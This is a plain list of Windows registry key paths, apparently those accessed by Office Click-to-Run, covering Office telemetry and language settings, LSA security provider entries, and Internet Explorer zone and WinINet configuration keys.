HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\EnabledLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Logging
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesRetrievalTimeCap
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\Debug
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ClientFolder
HKEY_CURRENT_USER\Control Panel\International\Geo
HKEY_CURRENT_USER\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SendCustomerData
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\DisableFirstRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusRulesEndpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusV3Endpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesSelectionCriteriaTestId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Debug
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\15.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\VersionToReport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PipelineServerName
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleResetInterval
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\ProviderId
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ExecutingScenario
HKEY_CURRENT_USER\Software\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EdgeRequestPending
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\ZoneMap\Ranges\
HKEY_CURRENT_USER\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Scenario\UPDATE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Scenario\UPDATE\DisplayLevel
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
